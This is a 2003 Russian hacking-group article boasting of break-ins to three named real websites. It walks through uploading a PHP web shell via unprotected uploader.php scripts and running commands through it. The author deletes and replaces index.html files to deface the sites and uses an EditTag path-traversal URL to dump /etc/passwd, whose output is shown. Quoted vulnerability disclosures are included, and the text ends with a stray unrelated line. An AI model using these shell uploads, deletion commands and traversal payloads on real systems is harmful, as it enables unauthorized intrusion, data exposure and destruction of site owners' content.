======================================================================
# #
# Author: {dr}{nerve} // k0dsweb gr0up #
# Статья является собственностью команды KODSWEB #
# Любое растпространение без нашего ведома строго запрещено. #
# -= 13.03.2003 =- #
# #
======================================================================
# #
# Взломы серверов на конкретных примерах #
# #
======================================================================
Итак, я решился пройтись по нескольким серверам с точки зрения анализа
их безопасности. О своих исследованиях я и расскажу в этой статье.
#========================================#>
# TARGET www.wangflop.com
#========================================#>
WangFlop - я выбрал этот сайт просто потому, что он мне не понравился.
Стал исследовать его страницы и наткнулся на функцию UPLOAD, которая
предлагала загрузить файл на сервер.
http://www.wangflop.com/uploader.php
Ваше дело предложить, наше отказаться. Но отказываться мы не будем,
а аплоудим:
----------shell.php---------
----------------------------
Нетрудно догадаться, что нам даст этот сплоит:
http://www.wangflop.com/uploads/shell.php?cmd=id
uid=1005(www) gid=1005(www) groups=1005(www)
http://www.wangflop.com/uploads/shell.php?cmd=ls%20-al
total 140 drwxrwxrwx 2 mgallagh mgallagh 512 Mar 10 08:53 . drwxr-xr-x 7
mgallagh mgallagh 1024 Mar 9 05:49 .. -rwxr-xr-x 1 www mgallagh 6806 Mar 9
17:59 bsd -rw-r--r-- 1 www mgallagh 3066 Mar 9 17:58 bsd.c -rwxr-xr-x 1 www
mgallagh 6880 Mar 9 18:06 fin -rw-r--r-- 1 www mgallagh 3210 Mar 9 18:05
fin.c -rwxr-xr-x 1 www mgallagh 6379 Mar 9 17:48 hlfd -rw-r--r-- 1 www
mgallagh 2845 Mar 9 17:37 hlfd.c -rw-r--r-- 1 www mgallagh 46 Mar 9 17:48
index.html -rwxr-xr-x 1 www mgallagh 3500 Mar 9 21:49 mad.php -rwxr-xr-x 1
www mgallagh 13944 Mar 10 06:57 prober.php3 -rwxr-xr-x 1 www mgallagh 50
Mar 10 08:46 shellemul.php -rwxr-xr-x 1 www mgallagh 48 Mar 10 04:14 t.php
-rwxr-xr-x 1 www mgallagh 16001 Mar 10 04:04 tmp.php
http://www.wangflop.com/uploads/shell.php?cmd=echo%20"hacked%20by%20k0dsweb"%20>%20index.html
"hacked by k0dsweb"
И так далее. Получаем полный контроль админа сайта, вплоть до удаления файлов.
Особо делать ничего не хотелось, и я оставил все как есть :]
Далее я вспомнил еще про один сайт, на котором стоял uploader
#========================================#>
# TARGET www.yoderandarmstrong.com
#========================================#>
Залил http-shell тем же способом.
http://www.yoderandarmstrong.com/uploads/shell.php?cmd=id
uid=1537(user837004) gid=1537(user837004) groups=1537(user837004)
Стал слоняться по директориям и заметил:
!!!!This Site is Hacked by Discovery!!!!!!
Видимо, здесь уже кто-то побывал. Но была изменена страница:
http://www.yoderandarmstrong.com/uploads/index.html
Я изменил ее на:
"Privet from Russia [kwt]"
Но захотелось большего, ведь лицо сайта (главная загрузочная страница)
не изменилась. Не порядок.
#
# Да и еще, я бы посоветовал вам просматривать сорсы в блокноте, потому что
# то, что выдает броузер - очень плохо читаемо. А мы любим, чтобы все было точно и
# по столбикам.
#
Блокнот:
========
total 110
drwxr-xr-x 11 user8370 user8370 2048 Mar 8 16:49 .
drwx-----x 6 user8370 user8370 1024 Mar 9 11:27 ..
drwxr-xr-x 2 user8370 user8370 96 Sep 20 12:07 _vti_cnf
-rw-r--r-- 1 user8370 user8370 1824 Sep 20 12:07 _vti_inf.html
drwxr-xr-x 2 user8370 user8370 96 Sep 20 12:07 _vti_pvt
drwxr-xr-x 2 user8370 user8370 96 Sep 20 12:07 _vti_txt
drwxr-xr-x 3 user8370 user8370 2048 Sep 28 11:12 admin
-rw-r--r-- 1 user8370 user8370 12553 Oct 7 11:52 allstuffmailer.php
drwxr-xr-x 2 user8370 user8370 1024 Sep 28 11:12 art
-rw-r--r-- 1 user8370 user8370 2393 Oct 1 16:40 contact.html
-rw-r--r-- 1 user8370 user8370 2391 Oct 1 16:37 contact_test.html
-rw-r--r-- 1 user8370 user8370 2774 Sep 28 11:12 directions.html
-rw-r--r-- 1 user8370 user8370 2817 Sep 28 11:12 directions_476.html
-rw-r--r-- 1 user8370 user8370 2821 Sep 28 11:12 directions_CCP.html
-rw-r--r-- 1 user8370 user8370 2945 Sep 28 11:12 directions_CLA.html
-rw-r--r-- 1 user8370 user8370 3254 Sep 28 11:12 directions_HPA.html
-rw-r--r-- 1 user8370 user8370 2867 Sep 28 11:12 directions_WWB.html
-rw-r--r-- 1 user8370 user8370 6492 Sep 28 11:12 equipment.html
-rw-r--r-- 1 user8370 user8370 1300 Sep 28 11:12 fs_contact.html
-rw-r--r-- 1 user8370 user8370 1303 Sep 28 11:12 fs_directions.html
-rw-r--r-- 1 user8370 user8370 1302 Sep 28 11:12 fs_equipment.html
-rw-r--r-- 1 user8370 user8370 1300 Oct 7 11:47 fs_ftp.html
-rw-r--r-- 1 user8370 user8370 1301 Sep 28 11:12 fs_register.html
-rw-r--r-- 1 user8370 user8370 3255 Sep 28 11:12 ftp.html
-rw-r--r-- 1 user8370 user8370 1050 Sep 28 11:12 ftp_success.html
-rw-r--r-- 1 user8370 user8370 137 Mar 6 08:18 hack_home.html
-rw-r--r-- 1 user8370 user8370 158 Mar 9 10:38 hack_index.html
drwxr-xr-x 3 user8370 user8370 96 Mar 8 04:22 images
-rw-r--r-- 1 user8370 user8370 2194 Mar 6 14:24 index.html
-rw-r--r-- 1 user8370 user8370 1364 Mar 8 07:09 indexhack.html
-rw-r--r-- 1 user8370 user8370 9 Mar 7 22:41 lol.html
-rw-r--r-- 1 user8370 user8370 212 Sep 28 11:13 nav_blankwhite.html
-rw-r--r-- 1 user8370 user8370 1787 Sep 28 11:13 nav_side.html
-rw-r--r-- 1 user8370 user8370 1742 Sep 28 11:13 nav_side1.html
-rw-r--r-- 1 user8370 user8370 653 Sep 28 11:13 nav_strip.html
-rw-r--r-- 1 user8370 user8370 1268 Sep 28 11:13 nav_top.html
-rw-r--r-- 1 user8370 user8370 1273 Sep 28 11:13 nav_top_home.html
drwxr-xr-x 2 user8370 user8370 1024 Sep 28 11:13 pdf
-rw-r--r-- 1 user8370 user8370 2458 Sep 28 11:13 postinfo.html
-rw-r--r-- 1 user8370 user8370 1674 Sep 28 11:13 register.html
-rw-r--r-- 1 user8370 user8370 1734 Oct 7 11:46 setup.php
-rw-r--r-- 1 user8370 user8370 1241 Sep 28 11:13 thank_you.html
-rw-r--r-- 1 user8370 user8370 1397 Oct 3 15:11 upload.html
-rw-r--r-- 1 user8370 user8370 7139 Oct 7 11:47 uploader.php
drwxr-xr-x 2 user8370 user8370 1024 Mar 10 09:28 uploads
drwxr-xr-x 2 user8370 user8370 1024 Mar 5 23:32 x_images
-rw-rw-rw- 1 user8370 user8370 1474 Sep 20 12:07 x_index.html
А вот и наш index.html, который уже ждет замены.
Делать на этом сайте было нечего, поэтому я решил доделать то, что начал.
cmd=rm -f index.html (удаляем из текущей директории одноименный файл: в противном
случае нам скажут, что такой файл уже существует и надобно его
переименовать)
cmd=rm -f ../ index.html (удаляем главный файл в корневой директории сайта)
Upload Status
File 1 has been uploaded
--------------------------------------------------------------------------------
627 Baltimore Avenue, East Lansdowne, PA 19050
phone: (215) 748-1400 or (610) 622-6118 / fax: (610) 622-6153
e-mail admin@yoderandarmstrong.com
Заливаем через uploader.php свой дефейс index.html
cmd=mv index.html ../index.html
Все! Дефейс готов!
Следующая цель:
#========================================#>
# TARGET www.spirit.org.nz
#========================================#>
И здесь нашлась нужная дырочка: EditTag
Где-то я это уже видел.
Через несколько минут моему взору открылось:
------------------------------------------------
4 февраля 2003
Доступ к произвольным файлам в EditTag
Уязвимость обнаружена в сценарии EditTag content management.
Удаленный пользователь может просматривать произвольные файлы на уязвимой системе.
По сообщениям, сценарий 'edittag.pl' не фильтрует данные, введенные пользователем.
В результате удаленный атакующий может представить последовательность обхода каталога
в переменной 'file', чтобы просмотреть произвольные файлы на системе с привилегиями
Web сервера:
http://[target]/edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd
------------------------------------------------
Оригинальный эксплоит тут:
------------------------------------------------
Vulnerability in edittag.pl
Vulnerability in edittag.pl
/ Уязвимости / Доступ к произвольным файлам в EditTag /
EditTag is a script which facilitates website content management.
EditTag allows users to edit pages using a web interface, but restricts
editing to specific tagged areas of the document. This feature enables
website managers to create a way for content authors who may
not know HTML to update a web page in real time without having to worry
about adversely affecting the underlying HTML code.
The website is here http://www.thebilberry.com/greg/edittag/
The problem with the script lies in the fact that it can be easily tricked
into allowing any file to be called up from the remote
server. An example exploit is as follows:
http://www.anything.com/edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd
This example will grab the passwd file from the remote webserver,
this is potentially dangerous.
The vendor has been contacted
------------------------------------------------
Применяем сплоит:
http://www.spirit.org.nz/cgi-bin/edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd
Получаем:
root:x:0:0:root:/root:/bin/bash
interroot:x:0:0:Interspeed:/home/interspeed:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:100:sync:/bin:/bin/sync
games:x:5:100:games:/usr/games:/bin/sh
man:x:6:100:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/spool/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
majordom:x:30:31:Majordomo:/usr/lib/majordomo:/bin/sh
postgres:x:31:32:postgres:/var/lib/postgres:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
msql:x:36:36:Mini SQL Database Manager:/var/lib/msql:/bin/sh
operator:x:37:37:Operator:/var:/bin/sh
list:x:38:38:SmartList:/var/list:/bin/sh
irc:x:39:39:ircd:/var:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats/gnats-db:/bin/sh
nobody:x:65534:65534:nobody:/home:/bin/sh
qoke:x:999:999:Qoke,,,:/home/qoke:/bin/bash
identd:x:100:65534::/var/run/identd:/bin/false
postfix:x:101:101::/var/spool/postfix:/bin/false
mysql:x:102:102:MySQL Server:/var/lib/mysql:/bin/false
ftp:x:103:65534::/home/ftp:/bin/false
listar:x:104:104::/usr/lib/listar:/bin/sh
paulc:x:2810:2810::/home/paulc:/bin/hosting
safarisp:x:2857:2857::/home/safarisp:/bin/hosting
freehost:x:7602:7602::/home/freehost:/bin/hosting
culford:x:2622:2622::/home/culford:/bin/hosting
jmove_1:x:2017:2017::/home/jmove_1:/dev/null
jmove_2:x:2018:2018::/home/jmove_2:/dev/null
jmove_3:x:2019:2019::/home/jmove_3:/dev/null
pyramids_6:x:4625:4625::/home/pyramids_6:/dev/null
butterflybay:x:6762:6762::/home/butterflybay:/bin/hosting
...
...
...
Немного позднее я узнал, что уязвимость, которую я заюзал я первых двух случаях,
имеет официальный эксплоит:
--------------------------------------------------------------------------------
From: kingcope@gmx.net
Date: 4 марта 2003 г.
Subject: uploader.php vulnerability
--------------------------------------------------------------------------------
Uploader Version 1.1 which is available from
http://www.phpscriptcenter.com/uploader.php
includes "uploader.php", which lets you upload ANY file (even scripts eg. in
PHP) onto the server
if no password protection is specified in the configuration file (default
set to off).
The supplied files will be uploaded into directory "uploads" if not
otherwise configured.
So if we create a file like this:
and upload it as "shellemul.php", we can execute commands by targeting our
browser to
http://www.victim.com/uploads/shellemul.php?cmd=id
which will give us -->
uid=48(apache) gid=48(apache) groups=48(apache)
We could even upload PHPShell and have more comfortable fun.
---
Google gets me 411 hits for "allinurl: uploader.php"
---
by kcope (kingcope@gmx.net)
--------------------------------------------------------------------------------
Но мне он даже не понадобился, потому как уязвимость аплоадеров - вещь довольно
известная, да и догадаться было нетрудно :]
Вот такие дела!
Все отзывы/предложения принимаются по адресу: admin@kodsweb.ru
[k0dsweb] kodsweb.ru
ОригинальныйТэн для стиральной машины